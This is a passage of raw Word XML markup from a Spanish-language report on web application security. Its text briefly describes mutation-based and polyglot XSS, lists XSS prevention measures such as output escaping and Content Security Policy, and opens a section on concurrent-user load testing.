          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4256C9A0" wp14:editId="1681E6D4">
                <wp:extent cx="57150" cy="57150"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:docPr id="5502" name="Group 5502"/>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474" name="Shape 474"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="57150" cy="57150"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="57150" h="57150">
                                <a:moveTo>
                                  <a:pt x="28575" y="0"/>
                                </a:moveTo>
                                <a:cubicBezTo>
                                  <a:pt x="32364" y="0"/>
                                  <a:pt x="36009" y="722"/>
                                  <a:pt x="39510" y="2174"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="43011" y="3621"/>
                                  <a:pt x="46101" y="5683"/>
                                  <a:pt x="48781" y="8365"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="51460" y="11041"/>
                                  <a:pt x="53525" y="14132"/>
                                  <a:pt x="54975" y="17633"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="56425" y="21137"/>
                                  <a:pt x="57150" y="24783"/>
                                  <a:pt x="57150" y="28575"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="57150" y="32361"/>
                                  <a:pt x="56425" y="36004"/>
                                  <a:pt x="54975" y="39505"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="53525" y="43005"/>
                                  <a:pt x="51460" y="46096"/>
                                  <a:pt x="48781" y="48778"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="46101" y="51454"/>
                                  <a:pt x="43011" y="53519"/>
                                  <a:pt x="39510" y="54970"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="36009" y="56421"/>
                                  <a:pt x="32364" y="57147"/>
                                  <a:pt x="28575" y="57150"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="24786" y="57147"/>
                                  <a:pt x="21141" y="56421"/>
                                  <a:pt x="17640" y="54970"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="14139" y="53519"/>
                                  <a:pt x="11049" y="51454"/>
                                  <a:pt x="8369" y="48778"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="5690" y="46096"/>
                                  <a:pt x="3625" y="43005"/>
                                  <a:pt x="2175" y="39505"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="725" y="36004"/>
                                  <a:pt x="0" y="32361"/>
                                  <a:pt x="0" y="28575"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="0" y="24783"/>
                                  <a:pt x="725" y="21137"/>
                                  <a:pt x="2175" y="17633"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="3625" y="14132"/>
                                  <a:pt x="5690" y="11041"/>
                                  <a:pt x="8369" y="8365"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="11049" y="5683"/>
                                  <a:pt x="14139" y="3621"/>
                                  <a:pt x="17640" y="2174"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="21141" y="722"/>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5F3664" id="Group 5502"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">
                <v:shape id="Shape 474"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" path="m28575,v3789,,7434,722,10935,2174c43011,3621,46101,5683,48781,8365v2679,2676,4744,5767,6194,9268c56425,21137,57150,24783,57150,28575v,3786,-725,7429,-2175,10930c53525,43005,51460,46096,48781,48778v-2680,2676,-5770,4741,-9271,6192c36009,56421,32364,57147,28575,57150v-3789,-3,-7434,-729,-10935,-2180c14139,53519,11049,51454,8369,48778,5690,46096,3625,43005,2175,39505,725,36004,,32361,,28575,,24783,725,21137,2175,17633,3625,14132,5690,11041,8369,8365,11049,5683,14139,3621,17640,2174,21141,722,24786,,28575,xe" fillcolor="black" stroked="f" strokeweight="0">
                  <v:stroke miterlimit="83231f" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,57150,57150"/>
                </v:shape>
                <w10:anchorlock/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidRPr="006F0019">
        <w:rPr>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> XSS basado en mutación</w:t>
      </w:r>
      <w:r w:rsidRPr="006F0019">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>: Aprovecha el analizador HTML del navegador, que puede corregir código HTML malformado de maneras que evaden los filtros de seguridad, pero aún permiten la ejecución de scripts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="350E3D03" w14:textId="77777777" w:rsidR="006F0019" w:rsidRPr="006F0019" w:rsidRDefault="006F0019" w:rsidP="006F0019">
      <w:pPr>
        <w:spacing w:after="290"/>
        <w:ind w:left="420" w:right="12" w:hanging="270"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1081157B" wp14:editId="4321C795">
                <wp:extent cx="57150" cy="57150"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:docPr id="5503" name="Group 5503"/>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479" name="Shape 479"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="57150" cy="57150"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="57150" h="57150">
                                <a:moveTo>
                                  <a:pt x="28575" y="0"/>
                                </a:moveTo>
                                <a:cubicBezTo>
                                  <a:pt x="32364" y="0"/>
                                  <a:pt x="36009" y="726"/>
                                  <a:pt x="39510" y="2170"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="43011" y="3621"/>
                                  <a:pt x="46101" y="5686"/>
                                  <a:pt x="48781" y="8365"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="51460" y="11044"/>
                                  <a:pt x="53525" y="14132"/>
                                  <a:pt x="54975" y="17636"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="56425" y="21137"/>
                                  <a:pt x="57150" y="24783"/>
                                  <a:pt x="57150" y="28575"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="57150" y="32361"/>
                                  <a:pt x="56425" y="36001"/>
                                  <a:pt x="54975" y="39505"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="53525" y="43005"/>
                                  <a:pt x="51460" y="46093"/>
                                  <a:pt x="48781" y="48778"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="46101" y="51451"/>
                                  <a:pt x="43011" y="53516"/>
                                  <a:pt x="39510" y="54967"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="36009" y="56418"/>
                                  <a:pt x="32364" y="57144"/>
                                  <a:pt x="28575" y="57150"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="24786" y="57144"/>
                                  <a:pt x="21141" y="56418"/>
                                  <a:pt x="17640" y="54967"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="14139" y="53516"/>
                                  <a:pt x="11049" y="51451"/>
                                  <a:pt x="8369" y="48778"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="5690" y="46093"/>
                                  <a:pt x="3625" y="43005"/>
                                  <a:pt x="2175" y="39505"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="725" y="36001"/>
                                  <a:pt x="0" y="32361"/>
                                  <a:pt x="0" y="28575"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="0" y="24783"/>
                                  <a:pt x="725" y="21143"/>
                                  <a:pt x="2175" y="17639"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="3625" y="14139"/>
                                  <a:pt x="5690" y="11044"/>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74CDD3" id="Group 5503"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">
                <v:shape id="Shape 479"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" path="m28575,v3789,,7434,726,10935,2170c43011,3621,46101,5686,48781,8365v2679,2679,4744,5767,6194,9271c56425,21137,57150,24783,57150,28575v,3786,-725,7426,-2175,10930c53525,43005,51460,46093,48781,48778v-2680,2673,-5770,4738,-9271,6189c36009,56418,32364,57144,28575,57150v-3789,-6,-7434,-732,-10935,-2183c14139,53516,11049,51451,8369,48778,5690,46093,3625,43005,2175,39505,725,36001,,32361,,28575,,24783,725,21143,2175,17639,3625,14139,5690,11044,8369,8365,11049,5686,14139,3621,17640,2170,21141,726,24786,,28575,xe" fillcolor="black" stroked="f" strokeweight="0">
                  <v:stroke miterlimit="83231f" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,57150,57150"/>
                </v:shape>
                <w10:anchorlock/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidRPr="006F0019">
        <w:rPr>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> XSS poliglota</w:t>
      </w:r>
      <w:r w:rsidRPr="006F0019">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>: Código malicioso que funciona simultáneamente como contenido válido en múltiples contextos (HTML, JavaScript, CSS), haciendo extremadamente difícil su detección y filtrado.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AB8C573" w14:textId="56168D07" w:rsidR="006F0019" w:rsidRDefault="006F0019" w:rsidP="006F0019">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="15" w:name="_Toc196776206"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>MEDIDAS DE PREVENCION</w:t>
      </w:r>
      <w:bookmarkEnd w:id="15"/>
    </w:p>
    <w:p w14:paraId="5D9AA80E" w14:textId="77777777" w:rsidR="006F0019" w:rsidRPr="006F0019" w:rsidRDefault="006F0019" w:rsidP="006F0019">
      <w:pPr>
        <w:spacing w:after="251"/>
        <w:ind w:right="12"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F0019">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>IBM Security (2023) recomienda las siguientes medidas para prevenir ataques XSS:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="112E1441" w14:textId="23EB40AE" w:rsidR="006F0019" w:rsidRPr="006F0019" w:rsidRDefault="006F0019" w:rsidP="006F0019">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:ind w:right="12"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F0019">
        <w:rPr>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Escapado de salida contextual</w:t>
      </w:r>
      <w:r w:rsidRPr="006F0019">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>: Convertir caracteres especiales en sus equivalentes HTML antes de renderizarlos.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58A7501B" w14:textId="77777777" w:rsidR="006F0019" w:rsidRPr="006F0019" w:rsidRDefault="006F0019" w:rsidP="006F0019">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:after="80"/>
        <w:ind w:right="12"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F0019">
        <w:rPr>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Content Security Policy (CSP)</w:t>
      </w:r>
      <w:r w:rsidRPr="006F0019">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>: Implementar políticas que limiten las fuentes de contenido ejecutable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35FA5900" w14:textId="3DC20E31" w:rsidR="006F0019" w:rsidRPr="006F0019" w:rsidRDefault="006F0019" w:rsidP="006F0019">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:after="80"/>
        <w:ind w:right="12"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F0019">
        <w:rPr>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Validación de entrada</w:t>
      </w:r>
      <w:r w:rsidRPr="006F0019">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>: Filtrar entradas maliciosas antes de procesarlas.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="724528B7" w14:textId="77777777" w:rsidR="006F0019" w:rsidRPr="006F0019" w:rsidRDefault="006F0019" w:rsidP="006F0019">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:ind w:right="12"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F0019">
        <w:rPr>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Uso de frameworks modernos</w:t>
      </w:r>
      <w:r w:rsidRPr="006F0019">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>: Utilizar frameworks que implementen protecciones XSS por defecto.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="734FDFE7" w14:textId="45809E49" w:rsidR="006F0019" w:rsidRPr="006F0019" w:rsidRDefault="006F0019" w:rsidP="006F0019">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:ind w:right="12"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F0019">
        <w:rPr>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>HTTPOnly y Secure flags</w:t>
      </w:r>
      <w:r w:rsidRPr="006F0019">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>: Proteger cookies contra el acceso mediante JavaScript.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A2D1D49" w14:textId="10DDD07B" w:rsidR="006F0019" w:rsidRDefault="006F0019" w:rsidP="006F0019">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="16" w:name="_Toc196776207"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>PRUEBAS DE CARGA CON USUARIOS SIMULTANEOS</w:t>
      </w:r>
      <w:bookmarkEnd w:id="16"/>
    </w:p>
    <w:p w14:paraId="2893C4E5" w14:textId="2F3DD4F9" w:rsidR="006F0019" w:rsidRDefault="006F0019" w:rsidP="006F0019">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="17" w:name="_Toc196776208"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>DEFINICION E IMPORTANCIA</w:t>
      </w:r>
      <w:bookmarkEnd w:id="17"/>
    </w:p>
    <w:p w14:paraId="2E1535E3" w14:textId="77777777" w:rsidR="006F0019" w:rsidRPr="006F0019" w:rsidRDefault="006F0019" w:rsidP="006F0019">
      <w:pPr>
        <w:spacing w:after="293"/>
        <w:ind w:right="12"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F0019">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Las pruebas de carga con usuarios simultáneos evalúan el comportamiento, rendimiento y estabilidad de una aplicación web bajo condiciones de uso esperadas y extremas. Estas pruebas simulan múltiples usuarios concurrentes que realizan operaciones en la aplicación, permitiendo identificar cuellos de botella, problemas de escalabilidad y puntos de fallo (Meier et al., 2021).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72203197" w14:textId="3D1D1CBC" w:rsidR="006F0019" w:rsidRDefault="006F0019" w:rsidP="006F0019">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="18" w:name="_Toc196776209"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>ASPECTOS DE SEGURIDAD EN PRUEBAS DE CARGA</w:t>
      </w:r>
      <w:bookmarkEnd w:id="18"/>
    </w:p>
    <w:p w14:paraId="1CBC4793" w14:textId="77777777" w:rsidR="006F0019" w:rsidRPr="006F0019" w:rsidRDefault="006F0019" w:rsidP="006F0019">
      <w:pPr>
        <w:spacing w:after="221"/>
        <w:ind w:right="12"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F0019">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Según Cisco Security Research (2023), las pruebas de carga tienen implicaciones directas en la seguridad por las siguientes razones:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E12855A" w14:textId="77777777" w:rsidR="006F0019" w:rsidRPr="006F0019" w:rsidRDefault="006F0019" w:rsidP="006F0019">
      <w:pPr>
        <w:ind w:left="420" w:right="12" w:hanging="270"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="05D1A8B3" wp14:editId="57419E29">
                <wp:extent cx="57150" cy="57150"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:docPr id="5507" name="Group 5507"/>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515" name="Shape 515"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="57150" cy="57150"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="57150" h="57150">
                                <a:moveTo>
                                  <a:pt x="28575" y="0"/>
                                </a:moveTo>
                                <a:cubicBezTo>
                                  <a:pt x="32364" y="0"/>
                                  <a:pt x="36009" y="719"/>
                                  <a:pt x="39510" y="2167"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="43011" y="3618"/>
                                  <a:pt x="46101" y="5683"/>
                                  <a:pt x="48781" y="8362"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="51460" y="11041"/>
                                  <a:pt x="53525" y="14129"/>
                                  <a:pt x="54975" y="17630"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="56425" y="21134"/>
                                  <a:pt x="57150" y="24783"/>
                                  <a:pt x="57150" y="28575"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="57150" y="32361"/>
                                  <a:pt x="56425" y="36001"/>
                                  <a:pt x="54975" y="39498"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="53525" y="43002"/>
                                  <a:pt x="51460" y="46093"/>
                                  <a:pt x="48781" y="48778"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="46101" y="51451"/>
                                  <a:pt x="43011" y="53516"/>
                                  <a:pt x="39510" y="54967"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="36009" y="56418"/>
                                  <a:pt x="32364" y="57144"/>
                                  <a:pt x="28575" y="57150"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="24786" y="57144"/>
                                  <a:pt x="21141" y="56418"/>
                                  <a:pt x="17640" y="54967"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="14139" y="53516"/>
                                  <a:pt x="11049" y="51451"/>
                                  <a:pt x="8369" y="48778"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="5690" y="46093"/>
                                  <a:pt x="3625" y="43002"/>
                                  <a:pt x="2175" y="39498"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="725" y="36001"/>
                                  <a:pt x="0" y="32361"/>
                                  <a:pt x="0" y="28575"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="0" y="24783"/>
                                  <a:pt x="725" y="21134"/>
                                  <a:pt x="2175" y="17630"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="3625" y="14129"/>
                                  <a:pt x="5690" y="11041"/>
                                  <a:pt x="8369" y="8362"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="11049" y="5683"/>
                                  <a:pt x="14139" y="3618"/>
                                  <a:pt x="17640" y="2167"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="21141" y="719"/>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3903D9" id="Group 5507"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">
                <v:shape id="Shape 515"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" path="m28575,v3789,,7434,719,10935,2167c43011,3618,46101,5683,48781,8362v2679,2679,4744,5767,6194,9268c56425,21134,57150,24783,57150,28575v,3786,-725,7426,-2175,10923c53525,43002,51460,46093,48781,48778v-2680,2673,-5770,4738,-9271,6189c36009,56418,32364,57144,28575,57150v-3789,-6,-7434,-732,-10935,-2183c14139,53516,11049,51451,8369,48778,5690,46093,3625,43002,2175,39498,725,36001,,32361,,28575,,24783,725,21134,2175,17630,3625,14129,5690,11041,8369,8362,11049,5683,14139,3618,17640,2167,21141,719,24786,,28575,xe" fillcolor="black" stroked="f" strokeweight="0">
                  <v:stroke miterlimit="83231f" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,57150,57150"/>
                </v:shape>
                <w10:anchorlock/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidRPr="006F0019">
        <w:rPr>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> Detección de condiciones de carrera</w:t>
      </w:r>
      <w:r w:rsidRPr="006F0019">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>: Identificación de vulnerabilidades que solo se manifiestan bajo carga concurrente.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2792BB51" w14:textId="77777777" w:rsidR="006F0019" w:rsidRPr="006F0019" w:rsidRDefault="006F0019" w:rsidP="006F0019">
      <w:pPr>
        <w:ind w:left="420" w:right="12" w:hanging="270"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0B5D8182" wp14:editId="1D3E204F">
                <wp:extent cx="57150" cy="57150"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:docPr id="5508" name="Group 5508"/>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519" name="Shape 519"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="57150" cy="57150"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="57150" h="57150">
                                <a:moveTo>
                                  <a:pt x="28575" y="0"/>
                                </a:moveTo>
                                <a:cubicBezTo>
                                  <a:pt x="32364" y="0"/>
                                  <a:pt x="36009" y="726"/>
                                  <a:pt x="39510" y="2170"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="43011" y="3621"/>
                                  <a:pt x="46101" y="5686"/>
                                  <a:pt x="48781" y="8365"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="51460" y="11041"/>
                                  <a:pt x="53525" y="14129"/>
                                  <a:pt x="54975" y="17630"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="56425" y="21134"/>
                                  <a:pt x="57150" y="24780"/>
                                  <a:pt x="57150" y="28575"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="57150" y="32361"/>
                                  <a:pt x="56425" y="36001"/>
                                  <a:pt x="54975" y="39505"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="53525" y="43005"/>
                                  <a:pt x="51460" y="46093"/>
                                  <a:pt x="48781" y="48778"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="46101" y="51451"/>
                                  <a:pt x="43011" y="53516"/>
                                  <a:pt x="39510" y="54967"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="36009" y="56418"/>
                                  <a:pt x="32364" y="57144"/>
                                  <a:pt x="28575" y="57150"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="24786" y="57144"/>
                                  <a:pt x="21141" y="56418"/>
                                  <a:pt x="17640" y="54967"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="14139" y="53516"/>
                                  <a:pt x="11049" y="51451"/>
                                  <a:pt x="8369" y="48778"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="5690" y="46093"/>
                                  <a:pt x="3625" y="43005"/>
                                  <a:pt x="2175" y="39505"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="725" y="36001"/>
                                  <a:pt x="0" y="32361"/>
                                  <a:pt x="0" y="28575"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="0" y="24780"/>
                                  <a:pt x="725" y="21134"/>
                                  <a:pt x="2175" y="17630"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="3625" y="14129"/>
                                  <a:pt x="5690" y="11041"/>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1984D1" id="Group 5508"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">
                <v:shape id="Shape 519"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" path="m28575,v3789,,7434,726,10935,2170c43011,3621,46101,5686,48781,8365v2679,2676,4744,5764,6194,9265c56425,21134,57150,24780,57150,28575v,3786,-725,7426,-2175,10930c53525,43005,51460,46093,48781,48778v-2680,2673,-5770,4738,-9271,6189c36009,56418,32364,57144,28575,57150v-3789,-6,-7434,-732,-10935,-2183c14139,53516,11049,51451,8369,48778,5690,46093,3625,43005,2175,39505,725,36001,,32361,,28575,,24780,725,21134,2175,17630,3625,14129,5690,11041,8369,8365,11049,5686,14139,3621,17640,2170,21141,726,24786,,28575,xe" fillcolor="black" stroked="f" strokeweight="0">
                  <v:stroke miterlimit="83231f" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,57150,57150"/>
                </v:shape>
                <w10:anchorlock/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidRPr="006F0019">
        <w:rPr>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> Evaluación de mecanismos de limitación de tasa</w:t>
      </w:r>
      <w:r w:rsidRPr="006F0019">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>: Verificación de la efectividad de medidas contra ataques de denegación de servicio.</w:t>
      </w:r>
